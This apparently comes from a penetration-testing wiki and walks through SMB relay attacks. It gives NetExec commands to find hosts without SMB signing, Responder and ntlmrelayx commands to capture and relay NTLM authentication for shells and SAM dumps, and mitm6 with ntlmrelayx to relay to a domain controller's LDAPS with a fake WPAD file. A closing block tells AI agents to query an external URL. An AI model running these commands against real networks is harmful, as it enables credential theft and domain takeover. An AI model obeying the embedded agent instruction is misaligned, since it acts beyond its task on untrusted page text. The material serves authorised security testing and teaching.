# SMB Relaying An SMB relay attack is performed when an attacker can capture a users NTLM hash and then pass it to another machine that has SMB signing disabled. The goal of this attack, is to relay a user account that has better privileges than you as an attacker currently have. Ideally, this would be a domain or local administrator, so you can utilize their privileges for further attack paths. It should be noted that SMB signing must be disabled on relayed targets, as when SMB signing is not disabled, the domain will know that you are not really the user that is being relayed. This is due to the relayed packet not being signed, so the domain it will not allow you to authenticate. ## NetExec (find relay targets) The first step in SMB relaying, is finding any hosts that can be relayed. NetExec can generate a list of targets for use with SMB relaying. This is hosts with SMB signing not required. * The following command can be used: `netexec smb --gen-relay-list ` Equipped with this list, you can move onto using the tools below. ## IPv4 Relaying - Responder + ntlmrelayx.py Responder is a tool that can be setup to act as listener on your local subnet and watch for any victim machines initiating NTLMv1/v2 authentication requests. Once a request is intercepted, Responder will forward it to ntlmrelayx, which then relays the authentication request to the target machine. If the relayed authentication request is for a standard domain user, a SMB shell within the target is spawned. However, if the account has local administrative privileges on the target machine, then it is possible to conduct many attacks. Such as dump the SAM file to get local password hashes and more. * * **The following should be conducted to execute responder without SMB and HTTPs to setup relaying:** * Edit the **/responder/Responder.conf** file * Disable SMB (SMB = Off) * Disable HTTP (HTTP = Off) Execute responder with the following command `responder -I eth0 -v` **The following command will execute ntlmrelayx with a list of target hosts to relay to:** `ntlmrelayx.py -tf -smb2support -i` With Responder and ntlmrelayx running, you should now see authentication requests being relayed. ## IPv6 Relaying - MITM6 + ntlmrelayx.py MITM6 (Man-In-The-Middle6) is an IPv6 tool that exploits Windows machines by taking over the default DNS server, as IPv6 takes precedence over IPv4. As a DNS server, MITM6 will selectively reply to DNS queries of the attackers choosing and redirect the victims traffic to the attacker machine. MITM6 is very powerful when paired with ntlmrelayx and as we're taking precedence using IPv6, we are forcing ourselves to receive requests. This means we can aim for bigger things, namely a domain administrator relay and use it with a domain controller. * * **The following command will execute MITM6 to start receiving requests:** `mitm6 -i eth0 -d ` **The following command will execute ntlmrelayx and relay to a domain contoller:** To expand, this command will relay the requests to LDAPS on a domain controller. It will also send the victim a fake WPAD file and dump any gathered data inoto a folder called ‘stuff’ on the local system. `ntlmrelayx -6 -t ldaps:// -wh fwpad.domain.com -l stuff` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wiki.pentestlist.com/offensive-security/internal-infrastructure/movement/smb-relaying.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.